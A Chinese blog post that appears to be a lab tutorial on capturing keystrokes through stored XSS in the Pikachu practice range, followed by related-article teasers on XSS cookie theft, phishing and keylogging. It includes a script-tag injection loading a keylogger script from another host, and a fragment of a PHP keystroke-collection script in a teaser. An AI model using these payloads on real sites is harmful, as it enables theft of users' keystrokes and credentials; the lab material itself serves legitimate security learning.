利用XSS漏洞获取键盘记录

于 2024-09-05 16:05:16 发布
阅读量388 收藏
点赞数 17
分类专栏: XSS跨站脚本攻击 文章标签: xss 网络安全 学习方法 web安全 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73049307/article/details/141933702
版权

以pikachu靶场的xss后台的键盘记录为例:

(win11本机中开启phpstudy,让虚拟机win7进行访问,win7是受害者)

修改E:\phpstudy2018\PHPTutorial\WWW\pikachu\pkxss\rkeypress\rk.js文件的内容,如下图红框处:

之后在xss存储型中进行xss注入,输入以下xss注入语句:

<script src="http://10.4.27.70/pikachu/pkxss/rkeypress/rk.js"></script>

先随便敲点什么,然后访问xss后台的“键盘记录”就可以看到记录结果了:

(当然,键盘记录也只是局限于xss存储型页面)

每次刷新页面或者进入该页面都会被进行键盘记录:

若是想结束“键盘记录”就得删了存储记录或者初始化pikachu靶场

南暮思鸢
关注
  • 17
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 4284
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
XSS漏洞利用——键盘记录
cxrpty的博客
02-21 1390
实验环境:DVWA 实验原理:网页被植入xss脚本,普通用户访问此网页时,该用户在当前页面上所有的键盘按键都会被记录下来,并且发送到远端服务器 实验步骤: 一、在服务器创建一个keylog.php文件获取键盘记录,并将记录写入key.txt中。 php代码如下: <?php $file=fopen("key.txt","a"); if(isset($_REQUEST['key']...
XSS漏洞检测和利用
2301_80127209的博客
04-25 1451
通过构造一些特殊的xss poc,在可能出现XSS漏洞测试点将这些语句传入网站,我们就能过够相对轻松的探测出XSS漏洞
pikachu之xss获取键盘记录
2301_80661529的博客
02-28 701
此处xss漏洞主要利用src属性的跨站访问,使得被攻击者可以通过src属性自动跳转到攻击者的xss平台,祝各位学习顺利!
xss漏洞利用方式总结
zlloveyouforever的博客
10-13 2622
XSS漏洞利用方式简单总结。有问题的同学请私信我,文章中网页挂马这一部分确实比较难实现。 此平台优点:界面布局清新、数据可阅读性好、IP获取准确、IP地址定位精准、轻量级(无需数据库)、对数据存储进行加密、GitHub开源方便与开发者交流(生命周期长)。 可以看到,BlueLotus平台还提供了一些js模板,便于我们参考或者构
xss漏洞之——漏洞利用
wsnbbz的博客
03-04 1223
1.获取cookie进行无密码登陆 原理 网页被植入网页被植入xss脚本,普通用户访问此网页时,会自动将用户本地的cookie缓存发送到指定远端服务器 利用 (1)首先登陆一个页面,抓包获取cookie (2)复制此页面里任一选项的url,重启浏览器后直接访问此url,抓包修改cookie为上面获取的登陆成功后的cookie (3)页面登陆成功,无需密码 2.利用XSS漏洞获取管理员权限(获取...
beef利用xss漏洞实现攻击
m0_61506558的博客
08-22 1166
beef是一个XSS平台,有非常多的功能Exploit 模块用的最多,但初学者用Browser就足够了Beef-XSS平台基本使用 https://www.bilibili.com/video/av92711691/
XSS漏洞初步学习、深度利用
m0_55313512的博客
03-03 2375
XSS漏洞
XSSXSS漏洞详细指南
大河之犬的博客
05-06 1507
跨站脚本攻击(Cross-Site Scripting,XSS)是一种常见的网络安全漏洞,攻击者通过在网页上注入恶意脚本代码,从而在用户的浏览器上执行恶意操作。这些脚本可以是 JavaScript、HTML 或其他网页脚本语言。一旦用户在受感染的网页上进行交互,如点击链接或填写表单,恶意脚本就会在用户浏览器上执行,从而导致多种安全问题,包括但不限于:XSS 漏洞通常出现在没有充分验证用户输入的地方,比如网站的搜索框、评论区、表单提交等。预防 XSS 攻击的方法包括对用户输入进行严格过滤和转义,使用安全的开发
86.网络安全渗透测试—[常规漏洞挖掘与利用篇2]—[xss漏洞利用平台-搭建与测试]
qwsn
01-24 2918
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss漏洞利用平台-搭建与测试 1、详细说明 2、下载地址 3、搭建过程 4、测试模块:`基础认证钓鱼`【总是失败】 5、测试默认模块:`窃取cookie`【成功】 6、安装其他模块 7、测试模块:`获取内网 ip`【时好时坏】 8、测试模块:`键盘记录器`【成功】 9、测试模块:`html5截屏`【失败】 10、测试模块:`获取xss02.php页面源码`【成功】 11、总结
23、渗透测试笔记_XSS漏洞利用(打cookie_键盘记录)_20191121
__Qian的博客
11-21 1366
1、利用XSS打cookie 打开http://xss.fbisb.com,注册账号登入 点击创建项目,点击下一步 选择默认模块,选择keepsession,点击下一步 将xss注入代码复制 打开dvwa靶机,登录后选择xss stored,将复制的xss注入代码复制到message中,点击sign guestbook 再次点击xss stored 查看...
85.网络安全渗透测试—[常规漏洞挖掘与利用篇1]—[xss漏洞挖掘-测试与利用]
qwsn
01-25 5628
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、xss漏洞测试与利用 1、相关概念 2、xss漏洞类型 3、xss漏洞测试 4、xss漏洞利用原理:`盗取COOKIE` 5、xss漏洞利用示例:`盗取COOKIE` 6、xss漏洞利用原理:`基础认证钓鱼` 7、xss漏洞利用示例:`基础认证钓鱼` 8、xss漏洞利用原理:`键盘记录器` 9、xss漏洞利用示例:`键盘记录器` 10、关闭浏览器XSS防护机制 11、思考
xss漏洞测试(cookie的窃取和利用,钓鱼,键盘记录
qq_43814486的博客
05-03 4009
cookie的窃取和利用
本地搭建XSS 漏洞接收平台实践分享
zhengshaolin128的博客
08-31 530
XSS Platform 平台主要是用作验证跨站脚本攻击。该平台可以部署在本地或服务器环境中。我们可以使用 XSS Platfrom 平台搭建、学习或验证各种类型的 XSS 漏洞
网络安全XSS之HttpOnly防护(附实战案例)
等风来
09-01 368
HttpOnly作为一种重要的安全标志,主要用于防止攻击者通过XSS攻击窃取用户的Cookie数据,从而保护会话安全。在实现时,开发者只需要在设置Cookie时添加HttpOnly属性即可。然而,HttpOnly并不能完全消除XSS攻击的威胁,但在配合其他安全措施如Content Security Policy(CSP)和严格的输入验证时,能够有效提高Web应用的安全性。
XSS 漏洞 - 学习手册
最新发布
Blue17 の 小窝
09-02 277
WEB 安全漏洞 - XSS 漏洞的系统笔记导航
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8445
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
编程学习方法——感悟分享
qq_35623594的博客
08-26 529
编程的确是一条充满挑战的道路,每个开发者都可能在这条路上遇到挫折。面对Bug的迷宫和复杂算法,以下是一些我用来克服困难的策略,希望能为你的编程之路提供帮助。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值